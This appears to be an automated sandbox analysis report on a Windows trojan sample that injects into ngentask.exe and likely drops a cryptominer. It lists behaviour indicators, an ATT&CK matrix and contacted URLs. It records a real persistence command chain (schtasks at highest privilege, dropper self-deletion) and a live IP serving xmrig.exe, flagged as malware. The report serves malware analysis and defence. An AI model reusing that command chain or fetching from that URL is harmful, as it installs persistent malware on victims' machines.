Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe | Code function: 18_2_01040FA0
Source: QHSgso4hXH.exe, 00000000.00000003.271687790.000000000C196000.00000040.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMiner.exe2 vs QHSgso4hXH.exe
Source: QHSgso4hXH.exe, 00000000.00000003.268964870.000000000C190000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMiner.exe2 vs QHSgso4hXH.exe
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe | Section loaded: mscorsvc.dll (reported four times in the original listing)
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe CA003ECD9A6CAAE17824816D1D869173510B2EB3C13F62E1A5615F1DA64F9676
Source: QHSgso4hXH.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\QHSgso4hXH.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\QHSgso4hXH.exe C:\Users\user\Desktop\QHSgso4hXH.exe
Source: C:\Users\user\Desktop\QHSgso4hXH.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "ngentask" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe" &&START "" "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "ngentask" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe" /rl HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe"
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe C:\Users\user\AppData\Local\ServiceHub\ngentask.exe
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe C:\Users\user\AppData\Local\ServiceHub\ngentask.exe
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe C:\Users\user\AppData\Local\ServiceHub\ngentask.exe
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\QHSgso4hXH.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "ngentask" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe" &&START "" "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "ngentask" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe" /rl HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe"
Source: C:\Users\user\Desktop\QHSgso4hXH.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile created: C:\Users\user\AppData\Local\ServiceHubJump to behavior
Source: C:\Users\user\Desktop\QHSgso4hXH.exeFile created: C:\Users\user\AppData\Local\Temp\advapi32.dllJump to behavior
Source: classification engineClassification label: mal88.troj.evad.winEXE@21/3@2/2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_00405660 GetDiskFreeSpaceW,_malloc,_malloc,_fwprintf_s,_wprintf,_fputc,
Source: ngentask.exe.1.dr, Win32Native.csTask registration methods: 'CreateProcessAsUser', 'CreateEvent', 'CreateEnvironmentBlock', 'CreateFile'
Source: ngentask.exe.1.dr, TaskHelper.csTask registration methods: 'CorCreateNGenProcess'
Source: 8.0.ngentask.exe.6d0000.0.unpack, Win32Native.csTask registration methods: 'CreateProcessAsUser', 'CreateEvent', 'CreateEnvironmentBlock', 'CreateFile'
Source: 8.0.ngentask.exe.6d0000.0.unpack, TaskHelper.csTask registration methods: 'CorCreateNGenProcess'
Source: 1.0.ngentask.exe.400000.0.unpack, ao.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 1.0.ngentask.exe.400000.0.unpack, ao.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.3.QHSgso4hXH.exe.c190000.0.unpack, ao.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 0.3.QHSgso4hXH.exe.c190000.0.unpack, ao.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.3.QHSgso4hXH.exe.c190000.1.unpack, ao.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 0.3.QHSgso4hXH.exe.c190000.1.unpack, ao.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5608:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4484:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5824:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeMutant created: \Sessions\1\BaseNamedObjects\ndhzlmhiae
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4912:120:WilError_01
Source: C:\Users\user\Desktop\QHSgso4hXH.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\QHSgso4hXH.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\QHSgso4hXH.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: QHSgso4hXH.exeStatic file information: File size 1138176 > 1048576
Source: Binary string: NGenTask.pdb source: ngentask.exe, 00000008.00000000.291902355.00000000006D2000.00000002.00000001.01000000.00000008.sdmp, ngentask.exe.1.dr
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_00401090 push ss; ret
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_0040516F pushad ; ret
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_00404139 push edx; ret
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_004039A1 push ebx; ret
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_00403ABC push ss; retf
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_00403B64 push es; retf
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_00401448 push ds; ret
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_004076C5 push ecx; ret
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_00402ABD LoadLibraryW,GetProcAddress,VirtualProtect,GetProcAddress,GlobalFree,
Source: initial sampleStatic PE information: section name: .text entropy: 7.8950275690936
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile created: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeJump to dropped file

Boot Survival

barindex
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "ngentask" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe" /rl HIGHEST /f
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe TID: 2588 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe TID: 5812 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe TID: 6040 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe TID: 5428 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe TID: 5396 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\QHSgso4hXH.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\QHSgso4hXH.exe | Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\QHSgso4hXH.exe | Code function: 0_2_00407092 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\QHSgso4hXH.exe | Code function: 0_2_00402ABD LoadLibraryW,GetProcAddress,VirtualProtect,GetProcAddress,GlobalFree,
Source: C:\Users\user\Desktop\QHSgso4hXH.exe | Code function: 0_2_02A24340 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\QHSgso4hXH.exe | Code function: 0_2_02A244D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\QHSgso4hXH.exe | Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\QHSgso4hXH.exe | Code function: 0_2_00407092 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\QHSgso4hXH.exe | Code function: 0_2_00409142 SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\QHSgso4hXH.exe | Code function: 0_2_00405705 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\QHSgso4hXH.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000
Source: C:\Users\user\Desktop\QHSgso4hXH.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: DA2008
Source: C:\Users\user\Desktop\QHSgso4hXH.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 protect: page read and write
Source: C:\Users\user\Desktop\QHSgso4hXH.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "ngentask" /sc minute /tr "c:\users\user\appdata\local\servicehub\ngentask.exe" /rl highest /f && del /f /s /q /a "c:\windows\microsoft.net\framework\v4.0.30319\ngentask.exe" &&start "" "c:\users\user\appdata\local\servicehub\ngentask.exe
Source: C:\Users\user\Desktop\QHSgso4hXH.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "ngentask" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe" &&START "" "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "ngentask" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe" /rl HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe | Queries volume information: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe VolumeInformation
Source: C:\Users\user\Desktop\QHSgso4hXH.exe | Code function: 0_2_00409664 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
MITRE ATT&CK Matrix (techniques listed per tactic column; a leading number is the count shown in the original matrix cell)

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 1 Command and Scripting Interpreter; 11 Scheduled Task/Job; 2 Native API; At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
Persistence: 11 Scheduled Task/Job; 1 DLL Side-Loading; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Privilege Escalation: 311 Process Injection; 11 Scheduled Task/Job; 1 DLL Side-Loading; Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 31 Virtualization/Sandbox Evasion; 311 Process Injection; 2 Obfuscated Files or Information; 3 Software Packing; 1 DLL Side-Loading; Indicator Removal from Tools
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 1 System Time Discovery; 2 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 11 Remote System Discovery; 1 System Network Configuration Discovery; 1 File and Directory Discovery; 14 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: 11 Encrypted Channel; 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue
Behavior Graph (ID: 749056, Sample: QHSgso4hXH.exe, Startdate: 18/11/2022, Architecture: WINDOWS, Score: 88)

Top-level signatures: Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; Sigma detected: Schedule binary from dotnet directory; Machine Learning detection for sample

Process tree recovered from the graph:
  QHSgso4hXH.exe (started)
    DNS/IP: imarket-eg.com 160.153.50.70, 443, 49702 AS-26496-GO-DADDY-COM-LLCUS United States; www.imarket-eg.com; vxsljuxgekdpuv.307xvytdn0
    Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
    ngentask.exe (started)
      Dropped: C:\Users\user\AppData\Local\...\ngentask.exe, PE32
      cmd.exe (started)
        Signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Uses ping.exe to check the status of other devices and networks
        PING.EXE (started), DNS/IP: 127.0.0.1 unknown unknown
        ngentask.exe (started), which starts conhost.exe
        conhost.exe (started)
        2 other processes
  ngentask.exe (started, three instances), each starting conhost.exe

SourceDetectionScannerLabelLink
QHSgso4hXH.exe32%ReversingLabs
QHSgso4hXH.exe34%VirustotalBrowse
QHSgso4hXH.exe100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\ServiceHub\ngentask.exe0%ReversingLabs
C:\Users\user\AppData\Local\ServiceHub\ngentask.exe0%MetadefenderBrowse
SourceDetectionScannerLabelLinkDownload
0.3.QHSgso4hXH.exe.c190000.0.unpack100%AviraTR/ATRAPS.GenDownload File
1.0.ngentask.exe.400000.0.unpack100%AviraTR/ATRAPS.GenDownload File
0.3.QHSgso4hXH.exe.c190000.1.unpack100%AviraTR/ATRAPS.GenDownload File
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://vXsLjUXgEkdPUv.307xVYtdN0 | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/m | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-json/ | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/ | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.3.0 | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/de-sticky-frontend | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/a | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/themes/hello-elementor/theme.min.css?ver=2.3.1 | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.cs | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/videography/ | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/contact-us/# | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/s | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/l | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot?5.10.0);s | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.4.8 | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/d | 0% | Avira URL Cloud | safe | -
https://analytify.io/downloads/analytify-wordpress-plugin/ | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/comments/feed/ | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/uploads/2021/06/cropped-I-270x270.jpg | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?v | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/i | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/de-active-icon-box. | 0% | Avira URL Cloud | safe | -
http://193.218.201.246/xmrig.exe | 100% | Avira URL Cloud | malware | -
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min. | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/simple-line-icons. | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/uploads/2021/06/Logo-e1624927275244-300x96.png | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/uploads/elementor/css/post-164.css?ver=1637579040 | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/slick.css?ver=1.5. | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/jquery-1.12.4-wp.js | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/google-ads/ | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/web-design/ | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/library.bin | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/branding/ | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-includes/css/dist/block-library/style.min.css?ver=6.0.3 | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.4.8 | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/de-sticky-frontend. | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/jquery-migrate-1.4. | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/web-design-2/ | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.4.8 | 0% | Avira URL Cloud | safe | -
http://193.218.201.246/xmrig.exe(KKl | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/de_loop/ecs.js?ver= | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver= | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/chaty/css/chaty-front.min.css?ver=1630326243 | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/lib/ResizeSensor.mi | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/dethemekit-de-caro | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/themes/hello-elementor/style.min.css?ver=2.3.1 | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/uploads/2021/06/cropped-I-180x180.jpg | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4. | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.3.0 | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0) | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/uploads/2021/06/Logo-e1624927275244.png | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/lib/sticky-sidebar/ | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/js/preloaded-elements-handlers.mi | 0% | Avira URL Cloud | safe | -
http://vXsLjUXgEkdPUv.307xVYtdN0h8WhldS19UlhMR80~ | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/font-awesome.min | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/elementor-524/ | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/de_loop/ecs-style. | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/uploads/2021/06/cropped-I-192x192.jpg | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.4.8 | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.4.8 | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/uploads/elementor/css/post-171.css?ver=1637579040 | 0% | Avira URL Cloud | safe | -
